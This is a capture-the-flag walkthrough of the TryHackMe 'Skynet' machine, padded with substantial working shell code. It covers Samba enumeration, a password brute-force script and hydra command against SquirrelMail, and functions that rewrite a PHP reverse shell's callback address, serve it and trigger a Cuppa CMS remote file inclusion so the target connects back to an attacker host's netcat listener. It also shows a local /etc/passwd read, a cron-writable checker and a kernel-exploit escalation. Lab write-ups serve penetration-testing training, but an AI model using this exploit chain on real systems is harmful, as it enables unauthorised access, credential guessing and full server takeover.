SkyNet (TryHackMe) WriteUp
OK, let's compromise the machine. After deploying it, I head over to check it out. Let's browse to it first and see what it is.
It looks like a search site that reminds me a little of Google. I checked the page source, but nothing really came up. OK, let's look for hidden directories (if there are any) and see what clues we can get.
OK, we have several different directories. After checking all of them, it seems only the last one is the one we are looking for (is it?).
When I went over there, the next page appeared.
A SquirrelMail login page, version 1.4.23. It asks for a name and a password, and the page seems to work fine, so the correct username and password should bring us in. For now we only have this SquirrelMail 1.4.23 login and nothing else, besides some other directories we are not allowed to access. Let's scan this machine and look for open ports.
The Nmap scan shows interesting results: port 22 is open, and so are ports 139/445. The machine runs Samba, and it actually lets an anonymous user in. Let's try to connect to it with just "anonymous" and see if we can find anything.
Nice! We managed to get in as the anonymous user. Download the files to your local machine and see if they give us more clues that will help us finish this challenge.
The "attention" file is signed by Miles Dyson and warns about a malfunction that caused passwords to be changed. As for the other files, "log2.txt" contains a list of words that looks like a password file, and "log3.txt" contains nothing. So what do we have? A login page running SquirrelMail, a name, open ports, and a file containing what look like passwords.
Running enum4linux shows a share named milesdyson ("Miles Dyson Personal Share"). Now that we have done our searching and collected information, let's get back to the login page and try to brute-force it with the username milesdyson and see if we can get in.
There are two ways to brute-force it. The first is to use Burp Suite: capture the login request, send it to the Intruder tab, set the payloads we want, and start the attack.
The second is hydra with the http-post-form module, where we tell hydra exactly what to send and what a failed attempt looks like. I decided to use hydra with a command that brute-forces the password for this username. Let's see if we get it!
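What hydra's http-post-form module does, written out as a plain shell loop so the three inputs are explicit: the form fields, the wordlist, and the string that marks a failed login. This is an added example, not code from the original write-up. The field names are SquirrelMail 1.4.x's (login_username, secretkey), the failure text is SquirrelMail's and should be confirmed by submitting one wrong password by hand, and the URL path is a placeholder for the hidden directory found earlier.

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up: the logic behind
# `hydra http-post-form`, written out so the inputs are explicit.
# Assumptions: SquirrelMail 1.4.x field names (login_username/secretkey);
# FAIL_STRING is SquirrelMail's text for a bad login and should be confirmed
# by submitting one wrong password by hand; the URL path is a placeholder.

FAIL_STRING='Unknown user or password incorrect'

# form_brute <login-url> <username> <wordlist-file>
# Posts each candidate password; prints the first one whose reply does not
# contain FAIL_STRING and returns 0. Returns 1 when the list is exhausted.
form_brute() {
  url=$1 user=$2 wordlist=$3
  while IFS= read -r pass || [ -n "$pass" ]; do
    [ -n "$pass" ] || continue
    # -L follows the 302 SquirrelMail sends on success; -m bounds a stall.
    body=$(curl -sL -m 10 \
      --data-urlencode "login_username=$user" \
      --data-urlencode "secretkey=$pass" \
      --data-urlencode "js_autodetect_results=1" \
      --data-urlencode "just_logged_in=1" \
      "$url") || continue
    # An empty reply means the target dropped us, not that we got in:
    # treat it as noise, otherwise a hiccup looks like a valid password.
    [ -n "$body" ] || continue
    case "$body" in
      *"$FAIL_STRING"*) ;;                         # wrong password, next
      *) printf '%s\n' "$pass"; return 0 ;;
    esac
  done < "$wordlist"
  return 1
}

# Usage: form_brute http://TARGET/HIDDEN_DIR/src/redirect.php milesdyson wordlist.txt
```

The hydra one-liner with the same inputs is `hydra -l milesdyson -P wordlist.txt TARGET http-post-form "/HIDDEN_DIR/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect"`. Either way, the failure string is what decides a hit, so a wrong or too-broad `F=` string gives false positives, and an empty reply is a connection problem rather than a valid password, which is why the loop above skips it.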
Yes! After getting Miles's password we can log in to the SMB share we found earlier, remember? Let's log in and look for more clues.
OK, once we are in, we see some files and directories. Navigate to the notes directory; there are more files there, but one seems odd. Can you guess which one? Good. Use get to download it to your local machine, and... bling! We've got the hidden directory.
So, after another scan with gobuster, a Cuppa CMS installation is revealed. After checking it for vulnerabilities, I found that it is vulnerable to file inclusion: an attacker can make it include a remote or local PHP file, which can lead to full server compromise. The advisory is below.
https://www.exploit-db.com/exploits/25971
OK, now that we know there is an exploit, we can "upload" a PHP reverse shell to the server (we use the inclusion vulnerability to make the site fetch our payload) and gain access to it through our own listener.
Get a reverse shell from GitHub (search for pentestmonkey's php-reverse-shell or another one that works) and change the IP and port. Start netcat listening on the port you picked, and serve the shell with python3's http.server on port 80. Once that is done, you should get a shell!
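The steps above, wired together as shell functions. This is an added example, not code from the original write-up: it patches the reverse shell's callback address, serves it, and makes the vulnerable include fetch it. TARGET, HIDDEN_DIR and the attacker address are placeholders; the vulnerable parameter (alerts/alertConfigField.php?urlConfig=) is the one named in the linked exploit-db entry (25971).

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up. It chains the steps
# the text describes: patch the PHP reverse shell's callback address,
# serve it over HTTP, and make the vulnerable include fetch it.
# Assumptions: TARGET/HIDDEN_DIR and the attacker address are placeholders;
# the parameter (alerts/alertConfigField.php?urlConfig=) is the one named
# in the linked exploit-db entry (25971).

# prepare_shell <template.php> <out.php> <lhost> <lport>
# pentestmonkey's php-reverse-shell keeps the callback in two assignments
# near the top ($ip = '...'; and $port = ...;); rewrite both, then verify
# the rewrite actually happened instead of trusting sed silently.
prepare_shell() {
  sed -e "s/^\\\$ip = .*/\$ip = '$3';/" \
      -e "s/^\\\$port = .*/\$port = $4;/" "$1" > "$2" || return 1
  grep -qF "\$ip = '$3';" "$2" && grep -qF "\$port = $4;" "$2"
}

# serve_payload <dir> <port>
# python's http.server hands the .php file out as plain text, so our own
# box never executes it; the target's include() does. Port 80 needs root.
serve_payload() {
  (cd "$1" && python3 -m http.server "$2")
}

# check_lfi <cuppa-base-url>
# Sanity check before going remote: the same parameter reads local files.
# If this works but the remote include does not, allow_url_include is off.
check_lfi() {
  curl -s -m 10 "$1/alerts/alertConfigField.php?urlConfig=../../../../../../etc/passwd" \
    | grep -m1 '^root:'
}

# trigger_rfi <cuppa-base-url> <payload-url>
# A successful include blocks for as long as the reverse shell lives, so
# curl would never return on its own; -m caps the wait and we ignore the
# timeout exit code.
trigger_rfi() {
  curl -s -m 10 "$1/alerts/alertConfigField.php?urlConfig=$2" >/dev/null || true
}

# Order matters: listener first, then the web server, then the trigger.
#   nc -lvnp 4444
#   prepare_shell php-reverse-shell.php shell.php 10.8.0.2 4444
#   serve_payload . 80 &
#   check_lfi http://TARGET/HIDDEN_DIR && trigger_rfi http://TARGET/HIDDEN_DIR http://10.8.0.2/shell.php
```

Two things bite people here: the listener must be up before the trigger fires, because the include connects back immediately; and the payload URL must be served as plain text, which python's http.server does by default but a local Apache with PHP would not.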
OK, we got the flag. Let's try privilege escalation. After some searching, I found that milesdyson has a backup.sh file in his home directory that the crontab runs every minute, but I don't have write permission to it, so I kept searching until uname -a revealed the system is running Linux 4.8.0-58-generic. I searched for an exploit, found one for that kernel, and decided to give it a try.
I downloaded the exploit with wget from my local machine to the remote machine and hoped it would work. Note: download it to the /tmp directory, otherwise the command fails because of permissions. Compiling the source with gcc, then chmod +x and running it, gave me root, so it did work! Keep in mind that kernel exploits can crash the target, and they need gcc (or a matching prebuilt binary) on the box, so check both before running one.
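The cron check above can be scripted rather than eyeballed. The following shell function is an added example, not part of the original write-up: it walks a system crontab in /etc/crontab layout, pulls out the run-as user and the script for each entry, and reports the entries whose script the current user could overwrite or replace (a root job pointing at such a file is a straight privilege escalation; one we cannot write, like backup.sh here, is not by this route). The crontab and script in the demo are constructed, not the room's.

```shell
#!/usr/bin/env sh
# Added example, not from the original write-up: flag crontab entries whose
# script the current user can overwrite (or swap out, if its directory is
# writable). Only the /etc/crontab layout (m h dom mon dow user command)
# is handled; per-user crontabs have no user field.

# cron_writable <crontab-file>
# Prints "<user> <script> (file writable|directory writable)" per hit.
# Runs in a subshell so `set -f` and `set --` do not leak to the caller.
cron_writable() (
  file=$1
  set -f    # keep "*" in the schedule fields literal, no pathname expansion
  while IFS= read -r line || [ -n "$line" ]; do
    set -- $line                      # word-split the entry into fields
    [ $# -gt 0 ] || continue          # blank line
    case "$1" in
      '#'*|*=*) continue ;;           # comment, or SHELL=/PATH= variable
      @*) user=$2 script=$3 ;;        # @reboot / @daily style schedule
      *)  user=$6 script=$7 ;;        # five schedule fields, then user
    esac
    [ -n "$script" ] || continue
    if [ -w "$script" ]; then
      printf '%s %s (file writable)\n' "$user" "$script"
    elif [ -d "${script%/*}" ] && [ -w "${script%/*}" ]; then
      # We cannot edit the script, but we can replace it wholesale.
      printf '%s %s (directory writable)\n' "$user" "$script"
    fi
  done < "$file"
)

# demo_cron_check
# Constructed crontab (not the room's): one root job pointing at a script
# we own, two pointing where we have no write access. Expect one hit.
demo_cron_check() {
  d=$(mktemp -d)
  printf '#!/bin/sh\ntar czf /var/backups/home.tgz .\n' > "$d/backup.sh"
  cat > "$d/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
*/1 *   * * *   root    $d/backup.sh
17  *   * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot         root    $d/absent/job.sh
EOF
  cron_writable "$d/crontab"
  rm -rf "$d"
}

# Try it: demo_cron_check    or, on a target:  cron_writable /etc/crontab
```

On a real box, also look at /etc/cron.d/* with the same function, and remember that a script you cannot write may still call something you can (a relative command resolved through PATH, or a writable helper), which this check does not cover.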